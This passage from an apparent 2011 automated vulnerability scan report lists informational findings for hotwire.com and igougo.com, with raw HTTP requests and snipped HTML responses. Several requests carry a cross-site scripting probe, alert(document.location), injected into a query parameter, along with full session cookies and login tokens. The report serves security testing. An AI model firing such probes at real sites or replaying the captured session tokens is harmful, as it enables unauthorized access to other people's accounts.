Cookie: JSESSIONID=974DB21E0DA548F45875D88836CCB561; SaneID=974DB21E0DA548F45875D88836CCB56; hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//GfFEXccZLnQ9cx0NaloS+foj2E2Dil0d+iPYTYOKXR0HbQ0daheJbt99vtzXseEa+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T2Ii7hTLeddfkVbI7P1I/pc=; auth=true; NSC_qspe-xxx-qfstjtu=ffffffffaf131c8e45525d5f4f58455e445a4a422d6f

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Set-Cookie: gsc=3; Expires=Mon, 03-Oct-2011 06:59:59 GMT; Path=/
Set-Cookie: hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//l477VJL34JgBIItf8EEvK/oj2E2Dil0d+iPYTYOKXR0HbQ0daheJbt99vtzXseEa+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T2Ii7hTLeddfkVbI7P1I/pc=; Expires=Tue, 02-Oct-2012 00:38:25 GMT; Path=/
Set-Cookie: hotwirePageModuleState=pgoodCode=H&searchTokenId=1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:24 GMT
Content-Length: 288536


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="Content-Language" content="en-us"/>
<meta http-equ
...[SNIP]...
ngsv02.html" l gen true for "http://www.hotwire.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.hotwire.com" r (n 0 s 0 v 0 l 0))' />


<link rel="shortcut icon" href="http://ak-static.hotwirestatic.com/static/images/favicon2.ico?ver=207657"/>
<link rel="stylesheet" type="text/css" href="http://ak-static.hotwirestatic.com/static/deploy/master/hwCore.css?ver=216778"/>


<script>
...[SNIP]...
</script>


<script src="http://ak-static.hotwirestatic.com/static/deploy/master/hwCore.js?ver=219395"></script>


<link rel="stylesheet" href="http://ak-static.hotwirestatic.com/static/deploy/??css/purchasePath-sprite.css,css/results-sprite.css,css/hotels-sprite.css,css/hotelResults-sprite.css,css/tripWatcherLayout.css,ver=221726" type="text/css"/>

<link rel="stylesheet" href="http://ak-static.hotwirestatic.com/static/deploy/css/hotel/results/hotelResultsPrint.css?ver=209738" media="print" type="text/css"/>


<script type="text/javascript" src="http://ak-static.hotwirestatic.com/static/deploy/??javascript/core/HwStateSupport.js,javascript/hotel/SidebarFilterComp.js,ver=182672"></script>
...[SNIP]...
</script>


<a href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Packages&sid=S287&bid=B312628" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.header',
link:'dest3'});"
target="_new">
<span class="dealPrice">
...[SNIP]...
</a>
<a class="rightText" href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Packages&sid=S287&bid=B312628" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.header',
link:'dest3'});"
target="_new">
<img src="http://ak-static.hotwirestatic.com/static/images/travel-ticker/tt-hw-logo2.png?ver=169988"
class="ttHwLogo"
width="153"
height="18"
alt="Get great deals at www.travel-ticker.com"/>
<span class="staticMessage">
...[SNIP]...
<a href="http://www.hotwire.com/index.jsp" onclick="AnalyticsSupport.storeLinkId({moduleName:'NAV-LOGO',linkName:'HOTWIRE'});"><img src="http://ak-static.hotwirestatic.com/static/images/shell/hotwire-logo-3d.gif?ver=222960" width="165" height="33" border="0" alt="Hotwire.com Home"/></a>
...[SNIP]...
href="#" title="Help"
onclick="CompSupport.callJsObj('currencyHelpLayer', 'show', this); AnalyticsSupport.logOmnitureLinkEvent({moduleName:'curr-help', link: 'help1'}); return false;">
<img class='iconNormal' src='http://ak-static.hotwirestatic.com/static/images/global/icon-whats-this.gif?ver=193627' alt="Help"/>
</a>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-go.gif?ver=222337" alt="Go"/></button>
...[SNIP]...
</div>


<script type="text/javascript" src="http://ak-static.hotwirestatic.com/static/deploy/javascript/core/HwValidatorSupport.js?ver=177334"></script>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/core/buttons/btn-search.gif?ver=217676" alt="Find a hotel"/></button>
...[SNIP]...
<label>
<img src='http://ak-static.hotwirestatic.com/static/images/core/farefinder/gray.flighticon.gif?ver=215943' width='12' height='12' border='0'/>
Logan Intl Ai...
(1.0 - 7.5 miles)
<div class="clr">
...[SNIP]...
<div class="panControls" id="_pan">
<img src="http://ak-static.hotwirestatic.com/static/images/core/map/pan_arrow.png?ver=209098" width="39" height="39" border="0"
usemap="#_areaMap" alt="">
<map name="_areaMap" id="_areaMap">
...[SNIP]...
</span>
&#160;
<img src="http://ak-static.hotwirestatic.com/static/images/map-console/trip_advisor_logo.png?ver=190782" alt="TripAdvisor" />
<p>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/global/buttons/btn-yes-update-results.png?ver=205501" alt="yes"/></button>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/global/buttons/btn-no-thanks.png?ver=205501" alt="no"/></button>
...[SNIP]...
</em>"
class="nowrap">
<img src='http://ak-static.hotwirestatic.com/static/images/core/farefinder/gray.flighticon.gif?ver=215943' width='12' height='12' border='0'/>Logan Intl Airport BO&#133;
7.5 mi
</span>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-go.gif?ver=222337" alt="go"/></button>
...[SNIP]...
<div class="center">
<img class="waiting" src="http://ak-static.hotwirestatic.com/static/images/core/searching/popup/loading-animation.gif?ver=158026"
width="66" height="65" border="0" alt="...waiting..." /><br/>
<img class="message" src="http://ak-static.hotwirestatic.com/static/images/core/searching/popup/updating_animation_narrow.gif?ver=158026"
width="91" height="16" border="0" alt="Updating..." />
</div>
...[SNIP]...
<span class="imgAlign">
<img src="http://ak-static.hotwirestatic.com/static/images/hotel/results/imgSocialProof.png?ver=222796"/>
</span>
...[SNIP]...
<span class="imgAlign">
<img src="http://ak-static.hotwirestatic.com/static/images/hotel/results/imgSocialProof.png?ver=222796"/>
</span>
...[SNIP]...
<span class="imgAlign">
<img src="http://ak-static.hotwirestatic.com/static/images/hotel/results/imgSocialProof.png?ver=222796"/>
</span>
...[SNIP]...
<span class="imgAlign">
<img src="http://ak-static.hotwirestatic.com/static/images/hotel/results/imgSocialProof.png?ver=222796"/>
</span>
...[SNIP]...
<span class="imgAlign">
<img src="http://ak-static.hotwirestatic.com/static/images/hotel/results/imgSocialProof.png?ver=222796"/>
</span>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-go.gif?ver=222337" alt="Go"/></button>
...[SNIP]...
<a href="#"
onclick="return CompSupport.callJsObj(this, 'onSearchSubmit');return false;"><img
src="http://ak-static.hotwirestatic.com/static/images/buttons/forward-arrow-red.gif?ver=222337"
alt="compare"> Compare</a>
...[SNIP]...
</span><img src="http://ak-static.hotwirestatic.com/static/images/buttons/btn-update-results.png?ver=222337" alt="Submit"/></button>
...[SNIP]...
<a href="#" onclick="return CompSupport.getJsObj(this).openFeedbackForm(this);">
<img src="http://ak-static.hotwirestatic.com/static/images/core/opinionlab/balloon-icon.gif?ver=156461" alt=""/>
<strong>
...[SNIP]...
</strong>
<img src="http://ak-static.hotwirestatic.com/static/images/core/opinionlab/pop-up-icon.gif?ver=156461" alt="" class="pop-up-icon">
</a>
...[SNIP]...
</script>


<a href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Hotels&sid=S287&bid=B312633" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.footer',
link:'dest4'});"
target="_new">
<span class="dealPrice">
...[SNIP]...
</a>
<a class="rightText" href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Hotels&sid=S287&bid=B312633" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.footer',
link:'dest4'});"
target="_new">
<img src="http://ak-static.hotwirestatic.com/static/images/travel-ticker/tt-hw-logo2.png?ver=169988"
class="ttHwLogo"
width="153"
height="18"
alt="Get great deals at www.travel-ticker.com"/>
<span class="staticMessage">
...[SNIP]...
<li><a href="http://www.advertising.expedia.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-FOOTER:loc:0:ADVERTISERS',
'external-link','http://www.advertising.expedia.com', AnalyticsSupport.pageId)">Advertisers</a>
...[SNIP]...
</a> -
<a target="_blank" href="http://www.carrentals.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:CARRENTALS',
'external-link','http://www.carrentals.com', AnalyticsSupport.pageId);">CarRentals.com</a> -
<a target="_blank" href="http://www.travel-ticker.com/"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:TRAVEL-TICKER',
'external-link','http://www.travel-ticker.com', AnalyticsSupport.pageId);">Travel-Ticker.com</a>
...[SNIP]...
</strong>
<a target="_blank" href="http://www.expedia.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:EXPEDIA',
'external-link','http://www.expedia.com', AnalyticsSupport.pageId);">Expedia</a> -
<a target="_blank" href="http://www.hotels.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:HOTELS',
'external-link','http://www.hotels.com', AnalyticsSupport.pageId);">Hotels.com</a> -
<a target="_blank" href="http://www.classicvacations.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:CLASSIC',
'external-link','http://www.classicvacations.com', AnalyticsSupport.pageId);">ClassicVacations.com</a> -
<a target="_blank" href="http://www.tripadvisor.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:TRIPADVISOR',
'external-link','http://www.tripadvisor.com', AnalyticsSupport.pageId);">TripAdvisor.com</a> -
<a target="_blank" href="http://www.smartertravel.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:SMARTER-TVL',
'external-link','http://www.smartertravel.com', AnalyticsSupport.pageId);">Smarter Travel</a> -
<a target="_blank" href="http://www.egencia.com/" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:EGENCIA',
'external-link','http://www.egencia.com/', AnalyticsSupport.pageId);">Egencia</a>
...[SNIP]...
<strong><a target="_blank" href="http://iac.com/index.html"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:IAC',
'external-link','http://iac.com/index.html', AnalyticsSupport.pageId);">IAC/InterActiveCorp</a>
...[SNIP]...
</strong>
<a target="_blank" href="http://www.bloglines.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:BLOGLINES',
'external-link','http://www.bloglines.com', AnalyticsSupport.pageId);">Bloglines</a> -
<a target="_blank" href="http://www.citysearch.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:CITY-SEARCH',
'external-link','http://www.citysearch.com', AnalyticsSupport.pageId);">Citysearch</a> -
<a target="_blank" href="http://www.evite.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:EVITE',
'external-link','http://www.evite.com', AnalyticsSupport.pageId);">Evite</a> -
<a target="_blank" href="http://www.gifts.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:GIFTS',
'external-link','http://www.gifts.com', AnalyticsSupport.pageId);">Gifts</a> -
<a target="_blank" href="http://www.lendingtree.com/"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:LENDING-TREE',
'external-link','http://www.lendingtree.com/', AnalyticsSupport.pageId);">LendingTree</a> -
<a target="_blank" href="http://www.match.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:MATCH','external-link',
'http://www.match.com', AnalyticsSupport.pageId);">Match</a> -
<a target="_blank" href="http://www.hsn.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:ONLINE-SHOPPING',
'external-link','http://www.hsn.com', AnalyticsSupport.pageId);">Online Shopping</a> -
<a target="_blank" href="http://www.pronto.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:PRONTO',
'external-link','http://www.pronto.com', AnalyticsSupport.pageId);">Pronto</a> -
<a target="_blank" href="http://www.servicemagic.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:SERVICEMAGIC',
'external-link','http://www.servicemagic.com', AnalyticsSupport.pageId);">ServiceMagic</a> -
<a target="_blank" href="http://www.shoebuy.com"
onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:SHOES','external-link',
'http://www.shoebuy.com', AnalyticsSupport.pageId);">Shoebuy</a> -
<a target="_blank" href="http://www.thedailybeast.com" onclick="cmPageviewOnClick(AnalyticsSupport.pageId + ':NAV-PARTNERS:loc:0:THE-DAILY-BEAST',
'external-link','http://www.thedailybeast.com', AnalyticsSupport.pageId);">The Daily Beast</a>
...[SNIP]...
<div class="yui3-u rightInfo">
<img class="mr10" src="http://ak-static.hotwirestatic.com/static/images/shell/BBB_logo_A.jpg?ver=222960" width="135" height="53" border="0" alt="BBB Acredited Business"/>
<a target="_blank" href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--27352.html"><img class="bizrate"
src="http://ak-static.hotwirestatic.com/static/images/shell/bizrate_27352_medal_sm.gif?ver=222960" width="112" height="37" border="0" alt="Bizrate Registered Store"/></a>
...[SNIP]...
19.205. http://www.igougo.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-4; mbox=session#1317601622475-177474#1317604984|PC#1317601622475-177474.19#1318812724|check#true#1317603184; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:52:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36801


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="5ZNp3byNbF4rEWpnV3Mgyig3ck+AM/H1JHJZ7rg546Nro6tmpBO79IXKcqIJ4C7B68/bNMrfxkMrNXTYUJtk3H/IsKviVwR5Iwpi2TYMU6oH4U3USehc0e6zulY=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=1&random=634531891317407305?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=1&random=634531891317407305?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=1&random=634531891317407305?" border="0"></a>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=2&random=634531891317407305?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=2&random=634531891317407305?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=2&random=634531891317407305?" border="0"></a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" class="ica i-twitter" target="_blank" rel="nofollow">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/igougo" class="ica i-facebook" target="_blank" rel="nofollow">Facebook</a>
...[SNIP]...
<p class="h3"> This bear is pensive. <a target="_blank" href="http://ow.ly/6JOui">http://ow.ly/6JOui</a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" target="_blank" rel="nofollow" >Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.in" target="_blank">India Hotels</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.au" target="_blank">Zuji Australia</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com" target="_blank">Travelocity</a>
...[SNIP]...
<dd><a href="http://www.travelocity.ca/ca" target="_blank">Travelocity Canada</a>
...[SNIP]...
<dd><a href="http://www.travelocity.com.mx/mx" target="_blank">Travelocity Mexico</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com" target="_blank">USA Hotels</a>
...[SNIP]...
<dd><a href="http://www.fr.lastminute.com" target="_blank">Lastminute.com France</a>
...[SNIP]...
<dd><a href="http://www.it.lastminute.com" target="_blank">Lastminute.com Italy</a>
...[SNIP]...
<dd><a href="http://www.es.lastminute.com" target="_blank">Lastminute.com Spain</a>
...[SNIP]...
<dd><a href="http://www.rejsefeber.dk" target="_blank">Rejsefeber Denmark</a>
...[SNIP]...
<dd><a href="http://www.reisefeber.no/" target="_blank">Reisefeber Norway</a>
...[SNIP]...
<dd><a href="http://www.resfeber.se/" target="_blank">Resfeber Sweden</a>
...[SNIP]...
<dd><a href="http://travelocity.com/LA" target="_blank">Travelocity LatAm</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.co/" target="_blank">Colombia Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.com.ec/" target="_blank">Ecuador Hotels</a>
...[SNIP]...
<dd><a href="http://www.allhotels.co.ve/" target="_blank">Venezuela Hotels</a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=3005558&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
19.206. http://www.igougo.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317601642.1; __utmb=179047228.1.10.1317601644; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D125%3B; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-2; mbox=session#1317601622475-177474#1317604709|PC#1317601622475-177474.19#1318812449|check#true#1317602909; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:02:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="NVxZLHrIqCswN0wRDdLbAP4q6i7JUBF/BSBKXwsRucQjl8JZXW8fooMbdWdfUcptWjfwNfh3+gW3yrXemG3k7WR8V+VhyM0fcttuCxI346cfwmMHvuUlHs6/8Fc=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=1&random=634531861569375000?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=1&random=634531861569375000?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=1&random=634531861569375000?" border="0"></a>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=2&random=634531861569375000?" type="text/javascript"></script>
               <noscript>
                   <a href="http://dm.travelocity.com/click.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=2&random=634531861569375000?"><img src="http://dm.travelocity.com/image.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=2&random=634531861569375000?" border="0"></a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" class="ica i-twitter" target="_blank" rel="nofollow">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/igougo" class="ica i-facebook" target="_blank" rel="nofollow">Facebook</a>
...[SNIP]...
<p class="h3"> This bear is pensive. <a target="_blank" href="http://ow.ly/6JOui">http://ow.ly/6JOui</a>
...[SNIP]...
<li><a href="http://twitter.com/igougo" target="_blank" rel="nofollow" >Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://svc.travelocity.com/mediakit/igougo-brandoverview.html" rel="nofollow" target="_blank">Advertise</a>
...[SNIP]...
<dd><a href="http://www.travelocity.co.in" target="_blank">Travelocity India</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.hk" target="_blank">Zuji Hong Kong</a>
...[SNIP]...
<dd><a href="http://www.zuji.com.sg" target="_blank">Zuji Singapore</a>
...[SNIP]...
